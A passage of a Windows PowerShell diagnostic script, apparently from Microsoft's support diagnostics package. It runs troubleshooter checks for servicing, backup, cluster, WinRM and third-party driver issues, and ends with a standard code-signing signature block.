Run-DiagExpression .\TS_DisablePagingExecutiveCheck.ps1
# [KSE Rule] [ Windows V3] Server Manager refresh issues and SDP changes reqd for MMC Snapin Issues in 2008, 2008 R2
Run-DiagExpression .\TS_ServerManagerRefreshKB2762229.ps1
# [KSE Rule] [ Windows V3] Handle leak in Svchost.exe when a WMI query is triggered by using the Win32_PowerSettingCapabilities
Run-DiagExpression .\TS_WMIHandleLeakKB2639077.ps1
# Checks 32 bit windows server 2003 / 2008 to see is DEP is disabled, if so it might not detect more than 4 GB of RAM.
Run-DiagExpression .\TS_DEPDisabled4GBCheck.ps1
# [Idea ID 2695] [Windows] Check the Log On account for the Telnet service to verify it's not using the Local System account
Run-DiagExpression .\TS_TelnetSystemAccount.ps1
# [Idea ID 2389] [Windows] Hang caused by kernel memory depletion due 'SystemPages' reg key with wrong value
Run-DiagExpression .\TS_MemoryManagerSystemPagesCheck.ps1
# [Idea ID 3474] [Windows] Pending Trans Rule - PendingXmlIdentifier, NextQueueEntryIndex, AdvancedInstallersNeedResolving
Run-DiagExpression .\TS_ServicingComponentsReg.ps1
# [Idea ID 3472] [Windows] Pending Transactions Rule Idea - Pending.xml
Run-DiagExpression .\TS_ServicingPendingXml.ps1
# [Idea ID 5712] [Windows] Run Dism checkhealth on Win8 or 2012 to detect possible servicing corruption
Run-DiagExpression .\TS_ServicingCorruptionCheck.ps1
# [Idea ID 1922] [Windows] On Windows 2008 R2 and Windows 7 System state backup fails with event id 5 and error 2155347997
Run-DiagExpression .\TS_BackupSystemStateKB2182466.ps1
# [Idea ID 3059] [Windows] Ntbackup high CPU and hang
Run-DiagExpression .\TS_FilesNotToBackup2K3Check.ps1
# [Idea ID 2004] [Windows] Bitlocker Drive Preparation fails with Error 'The new active drive cannot be formatted.'
Run-DiagExpression .\TS_BitlockerDenyWriteFixedPolicy.ps1
# [Idea ID 6711] [Windows] MSI package fails to install with error code HRESULT -2147319780
Run-DiagExpression .\TS_MSIPackageInstallationCheck.ps1
# [Idea ID 3002] [Windows] SP1 installation on Windows 7 and Windows Server 2008 R2 fails with the error 0x800F0826
Run-DiagExpression .\TS_UsbstorSystemPermissionsSPCheck.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Diag Phase module: TS_WinRM ---"
# Check if hotfix 2480954 installed
Run-DiagExpression .\TS_KB2480954AndWinRMStateCheck.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Diag Phase module: TS_Cluster ---"
if ($Global:skipTScluster -ne $true) {
# FailoverCluster Cluster Name Object AD check
Run-DiagExpression .\TS_ClusterCNOCheck.ps1
# [Idea ID 2169] [Windows] Xsigo network host driver can cause Cluster disconnects
Run-DiagExpression .\TS_ClusterXsigoDriverNetworkCheck.ps1
# [Idea ID 2251] [Windows] Cluster 2003 - Access denied errors during a join, heartbeat, and Cluster Admin open
Run-DiagExpression .\TS_Cluster2K3NoLmHash.ps1
# [Idea ID 2513] [Windows] IPv6 rules for Windows Firewall can cause loss of communications between cluster nodes
Run-DiagExpression .\TS_ClusterIPv6FirewallCheck.ps1
# [Idea ID 5258] [Windows] Identifying Cluster Hive orphaned resources located in the dependencies key
Run-DiagExpression .\TS_Cluster_OrphanResource.ps1
# [Idea ID 6519] [Windows] Invalid Class error on 2012 Clusters (SDP)
Run-DiagExpression .\TS_ClusterCAUWMINamespaceCheck.ps1
# [Idea ID 6500] [Windows] Invalid Namespace error on 2008 and 2012 Clusters
Run-DiagExpression .\TS_ClusterMSClusterWMINamespaceCheck.ps1
# Cluster Validation Report Troubleshooter
Run-DiagExpression .\TS_ClusterValidationTests.ps1
}
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Diag Phase module: TS_3rd party ---"
# [Idea ID 7521] [Windows] McAfee HIPS 7.0 adds numerous extraneous network adapter interfaces to registry
Run-DiagExpression .\TS_McAfeeHIPS70Check.ps1
# [Idea ID 986] [Windows] SBSL McAfee Endpoint Encryption for PCs may cause slow boot or delay between CTRL+ALT+DEL and Cred
Run-DiagExpression .\TS_SBSL_MCAfee_EEPC_SlowBoot.ps1
# [Idea ID 3181] [Windows] Symantec Endpoint Protection's smc.exe causing handle leak
Run-DiagExpression .\TS_SEPProcessHandleLeak.ps1
# Check for Sophos BEFLT.SYS version 5.60.1.7
Run-DiagExpression .\TS_B2693877_Sophos_BEFLTCheck.ps1
# [KSE Rule] [ Windows V3] HpCISSs2 version 62.26.0.64 causes 0xD1 or 0x9E
Run-DiagExpression .\TS_HpCISSs2DriverIssueCheck.ps1
# [Idea ID 2842] [Windows] Alert Engineers if they are working on a Dell machine models R910, R810 and M910
Run-DiagExpression .\TS_DellPowerEdgeBiosCheck.ps1
# [Idea ID 3919] [Windows] Create Shadow Copy fail only on VERTIAS storage foundation volume
Run-DiagExpression .\TS_VeritasVXIOBadConfigFlags.ps1
# [Idea ID 5327] [Windows] Machine imaged using vlite 1.2 will fail to install SP1
Run-DiagExpression .\TS_MachineImageVliteCheck.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- Diag Phase:TS_obsolete W2K3/XP ---"
# [Idea ID 2446] [Windows] Determining the trimming threshold set by the Memory Manager
Run-DiagExpression .\TS_2K3PoolUsageMaximum.ps1
# [Idea ID 7065] [Windows] Alert users about Windows XP EOS
#_# Run-DiagExpression .\TS_WindowsXPEOSCheck.ps1
}
# Hotfix Rollups
Run-DiagExpression .\DC_HotfixRollups.ps1
$stopTime_AutoAdd = Get-Date
$duration = $(New-TimeSpan -Start $startTime_AutoAdd -End $stopTime_AutoAdd)
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object "*** $(Get-Date -UFormat "%R:%S") DONE (Dur: $duration) TS_AutoAddCommands_Remote.ps1 SkipTS: $Global:skipTS - SkipBPA: $Global:skipBPA"
# SIG # Begin signature block
# MIIoPAYJKoZIhvcNAQcCoIIoLTCCKCkCAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCAnb01IPXLE01XL
# RGkF+qsNCcbdzJ8qHDiDFLwu36QzMaCCDYUwggYDMIID66ADAgECAhMzAAAEA73V
# lV0POxitAAAAAAQDMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p
# bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTEzWhcNMjUwOTExMjAxMTEzWjB0MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
# AQCfdGddwIOnbRYUyg03O3iz19XXZPmuhEmW/5uyEN+8mgxl+HJGeLGBR8YButGV
# LVK38RxcVcPYyFGQXcKcxgih4w4y4zJi3GvawLYHlsNExQwz+v0jgY/aejBS2EJY
# oUhLVE+UzRihV8ooxoftsmKLb2xb7BoFS6UAo3Zz4afnOdqI7FGoi7g4vx/0MIdi
# kwTn5N56TdIv3mwfkZCFmrsKpN0zR8HD8WYsvH3xKkG7u/xdqmhPPqMmnI2jOFw/
# /n2aL8W7i1Pasja8PnRXH/QaVH0M1nanL+LI9TsMb/enWfXOW65Gne5cqMN9Uofv
# ENtdwwEmJ3bZrcI9u4LZAkujAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE
# AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU6m4qAkpz4641iK2irF8eWsSBcBkw
# VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh
# dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMjkyNjAfBgNVHSMEGDAW
# gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v
# d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw
# MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov
# L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx
# XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB
# AFFo/6E4LX51IqFuoKvUsi80QytGI5ASQ9zsPpBa0z78hutiJd6w154JkcIx/f7r
# EBK4NhD4DIFNfRiVdI7EacEs7OAS6QHF7Nt+eFRNOTtgHb9PExRy4EI/jnMwzQJV
# NokTxu2WgHr/fBsWs6G9AcIgvHjWNN3qRSrhsgEdqHc0bRDUf8UILAdEZOMBvKLC
# rmf+kJPEvPldgK7hFO/L9kmcVe67BnKejDKO73Sa56AJOhM7CkeATrJFxO9GLXos
# oKvrwBvynxAg18W+pagTAkJefzneuWSmniTurPCUE2JnvW7DalvONDOtG01sIVAB
# +ahO2wcUPa2Zm9AiDVBWTMz9XUoKMcvngi2oqbsDLhbK+pYrRUgRpNt0y1sxZsXO
# raGRF8lM2cWvtEkV5UL+TQM1ppv5unDHkW8JS+QnfPbB8dZVRyRmMQ4aY/tx5x5+
# sX6semJ//FbiclSMxSI+zINu1jYerdUwuCi+P6p7SmQmClhDM+6Q+btE2FtpsU0W
# +r6RdYFf/P+nK6j2otl9Nvr3tWLu+WXmz8MGM+18ynJ+lYbSmFWcAj7SYziAfT0s
# IwlQRFkyC71tsIZUhBHtxPliGUu362lIO0Lpe0DOrg8lspnEWOkHnCT5JEnWCbzu
# iVt8RX1IV07uIveNZuOBWLVCzWJjEGa+HhaEtavjy6i7MIIHejCCBWKgAwIBAgIK
# YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV
# BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv
# c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm
# aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw
# OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE
# BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD
# VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG
# 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la
# UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc
# 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D
# dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+
# lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk
# kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6
# A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd
# X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL
# 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd
# sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3
# T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS
# 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI
# bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL
# BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD
# uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv
# c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf
# MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3
# dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf
# MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF
# BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h
# cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA
# YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn
# 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7
# v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b
# pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/
# KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy
# CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp
# mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi
# hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb
# BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS
# oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL
# gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX
# cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGg0wghoJAgEBMIGVMH4x
# CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt
# b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p
# Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAQDvdWVXQ87GK0AAAAA
# BAMwDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw
# HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEICMP
# ydAc95hOxTKTbaZ1aStcVonzztoxoXf4W3cmYbSUMEIGCisGAQQBgjcCAQwxNDAy
# oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20wDQYJKoZIhvcNAQEBBQAEggEAO5TOIM2o1KOCzl0WzryCllCRUsu45ANbGaNj
# YTW12rx/bfSJJhjSZBVAJEUbbQfRA3SD+OpnWtTLMyFfvc0V5rDXlkeR6H1v8wHf
# gg/iDlB5PCzTJ7EzVQWwk8Lsuxf2P4pz+p/VOGGF6Tx3T/K9Vtj6uZfXNwMyr+wv
# Q3Ts/sFnRbxaD4EIhsiLOfvf4cID04ZpeOpXnKqTAHL5mXGCkbg1BSu/KrOb0YoW
# LHPo13qYRp70Gvvm/EQMQgQJCJjFzx4RrhzVUuz2m0qqIea8iWCZ1RZVK4qZvSqG
# 0yE0mFRERhT+uD6MISq0xOGP0KS+3B1x2JZ/BCmmNhuZfa5HJ6GCF5cwgheTBgor
# BgEEAYI3AwMBMYIXgzCCF38GCSqGSIb3DQEHAqCCF3AwghdsAgEDMQ8wDQYJYIZI
# AWUDBAIBBQAwggFSBgsqhkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGE
# WQoDATAxMA0GCWCGSAFlAwQCAQUABCDwCnVSb/plvykTtklka0RAxl/cvRdB1DVE
# iQzRPi8FcgIGZxp39n/1GBMyMDI0MTAyODExNDA1MC40MzlaMASAAgH0oIHRpIHO
# MIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
# UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQL
# ExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxk
# IFRTUyBFU046OTIwMC0wNUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1l
# LVN0YW1wIFNlcnZpY2WgghHtMIIHIDCCBQigAwIBAgITMwAAAecujy+TC08b6QAB
# AAAB5zANBgkqhkiG9w0BAQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz
# aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv
# cnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAx
# MDAeFw0yMzEyMDYxODQ1MTlaFw0yNTAzMDUxODQ1MTlaMIHLMQswCQYDVQQGEwJV
# UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE
# ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l
# cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046OTIwMC0w
# NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Uw
# ggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDCV58v4IuQ659XPM1DtaWM
# v9/HRUC5kdiEF89YBP6/Rn7kjqMkZ5ESemf5Eli4CLtQVSefRpF1j7S5LLKisMWO
# GRaLcaVbGTfcmI1vMRJ1tzMwCNIoCq/vy8WH8QdV1B/Ab5sK+Q9yIvzGw47TfXPE
# 8RlrauwK/e+nWnwMt060akEZiJJz1Vh1LhSYKaiP9Z23EZmGETCWigkKbcuAnhvh
# 3yrMa89uBfaeHQZEHGQqdskM48EBcWSWdpiSSBiAxyhHUkbknl9PPztB/SUxzRZj
# UzWHg9bf1mqZ0cIiAWC0EjK7ONhlQfKSRHVLKLNPpl3/+UL4Xjc0Yvdqc88gOLUr
# /84T9/xK5r82ulvRp2A8/ar9cG4W7650uKaAxRAmgL4hKgIX5/0aIAsbyqJOa6OI
# GSF9a+DfXl1LpQPNKR792scF7tjD5WqwIuifS9YUiHMvRLjjKk0SSCV/mpXC0BoP
# kk5asfxrrJbCsJePHSOEblpJzRmzaP6OMXwRcrb7TXFQOsTkKuqkWvvYIPvVzC68
# UM+MskLPld1eqdOOMK7Sbbf2tGSZf3+iOwWQMcWXB9gw5gK3AIYK08WkJJuyzPqf
# itgubdRCmYr9CVsNOuW+wHDYGhciJDF2LkrjkFUjUcXSIJd9f2ssYitZ9CurGV74
# BQcfrxjvk1L8jvtN7mulIwIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFM/+4JiAnzY4
# dpEf/Zlrh1K73o9YMB8GA1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8G
# A1UdHwRYMFYwVKBSoFCGTmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMv
# Y3JsL01pY3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBs
# BggrBgEFBQcBAQRgMF4wXAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0
# LmNvbS9wa2lvcHMvY2VydHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUy
# MDIwMTAoMSkuY3J0MAwGA1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUH
# AwgwDgYDVR0PAQH/BAQDAgeAMA0GCSqGSIb3DQEBCwUAA4ICAQB0ofDbk+llWi1c
# C6nsfie5Jtp09o6b6ARCpvtDPq2KFP+hi+UNNP7LGciKuckqXCmBTFIhfBeGSxvk
# 6ycokdQr3815pEOaYWTnHvQ0+8hKy86r1F4rfBu4oHB5cTy08T4ohrG/OYG/B/gN
# nz0Ol6v7u/qEjz48zXZ6ZlxKGyZwKmKZWaBd2DYEwzKpdLkBxs6A6enWZR0jY+q5
# FdbV45ghGTKgSr5ECAOnLD4njJwfjIq0mRZWwDZQoXtJSaVHSu2lHQL3YHEFikun
# bUTJfNfBDLL7Gv+sTmRiDZky5OAxoLG2gaTfuiFbfpmSfPcgl5COUzfMQnzpKfX6
# +FkI0QQNvuPpWsDU8sR+uni2VmDo7rmqJrom4ihgVNdLaMfNUqvBL5ZiSK1zmaEL
# BJ9a+YOjE5pmSarW5sGbn7iVkF2W9JQIOH6tGWLFJS5Hs36zahkoHh8iD963LeGj
# ZqkFusKaUW72yMj/yxTeGEDOoIr35kwXxr1Uu+zkur2y+FuNY0oZjppzp95AW1le
# hP0xaO+oBV1XfvaCur/B5PVAp2xzrosMEUcAwpJpio+VYfIufGj7meXcGQYWA8Um
# r8K6Auo+Jlj8IeFS6lSvKhqQpmdBzAMGqPOQKt1Ow3ZXxehK7vAiim3ZiALlM0K5
# 46k0sZrxdZPgpmz7O8w9gHLuyZAQezCCB3EwggVZoAMCAQICEzMAAAAVxedrngKb
# SZkAAAAAABUwDQYJKoZIhvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQI
# EwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3Nv
# ZnQgQ29ycG9yYXRpb24xMjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmlj
# YXRlIEF1dGhvcml0eSAyMDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIy
# NVowfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcT
# B1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UE
# AxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEB
# AQUAA4ICDwAwggIKAoICAQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXI
# yjVX9gF/bErg4r25PhdgM/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjo
# YH1qUoNEt6aORmsHFPPFdvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1y
# aa8dq6z2Nr41JmTamDu6GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v
# 3byNpOORj7I5LFGc6XBpDco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pG
# ve2krnopN6zL64NF50ZuyjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viS
# kR4dPf0gz3N9QZpGdc3EXzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYr
# bqgSUei/BQOj0XOmTTd0lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlM
# jgK8QmguEOqEUUbi0b1qGFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSL
# W6CmgyFdXzB0kZSU2LlQ+QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AF
# emzFER1y7435UsSFF5PAPBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIu
# rQIDAQABo4IB3TCCAdkwEgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIE
# FgQUKqdS/mTEmr6CkTxGNSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWn
# G1M1GelyMFwGA1UdIARVMFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEW
# M2h0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5
# Lmh0bTATBgNVHSUEDDAKBggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBi
# AEMAQTALBgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV
# 9lbLj+iiXGJo0T2UkFvXzpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3Js
# Lm1pY3Jvc29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAx
# MC0wNi0yMy5jcmwwWgYIKwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8v
# d3d3Lm1pY3Jvc29mdC5jb20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2
# LTIzLmNydDANBgkqhkiG9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv
# 6lwUtj5OR2R4sQaTlz0xM7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZn
# OlNN3Zi6th542DYunKmCVgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1
# bSNU5HhTdSRXud2f8449xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4
# rPf5KYnDvBewVIVCs/wMnosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU
# 6ZGyqVvfSaN0DLzskYDSPeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDF
# NLB62FD+CljdQDzHVG2dY3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/
# HltEAY5aGZFrDZ+kKNxnGSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdU
# CbFpAUR+fKFhbHP+CrvsQWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKi
# excdFYmNcP7ntdAoGokLjzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTm
# dHRbatGePu1+oDEzfbzL6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZq
# ELQdVTNYs6FwZvKhggNQMIICOAIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMx
# EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT
# FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJp
# Y2EgT3BlcmF0aW9uczEnMCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOjkyMDAtMDVF
# MC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMK
# AQEwBwYFKw4DAhoDFQCzcgTnGasSwe/dru+cPe1NF/vwQ6CBgzCBgKR+MHwxCzAJ
# BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25k
# MR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jv
# c29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6smTdjAi
# GA8yMDI0MTAyODA0MzcxMFoYDzIwMjQxMDI5MDQzNzEwWjB3MD0GCisGAQQBhFkK
# BAExLzAtMAoCBQDqyZN2AgEAMAoCAQACAgsfAgH/MAcCAQACAhSeMAoCBQDqyuT2
# AgEAMDYGCisGAQQBhFkKBAIxKDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSCh
# CjAIAgEAAgMBhqAwDQYJKoZIhvcNAQELBQADggEBAACu8K1erSG3WA+KFwBfZzin
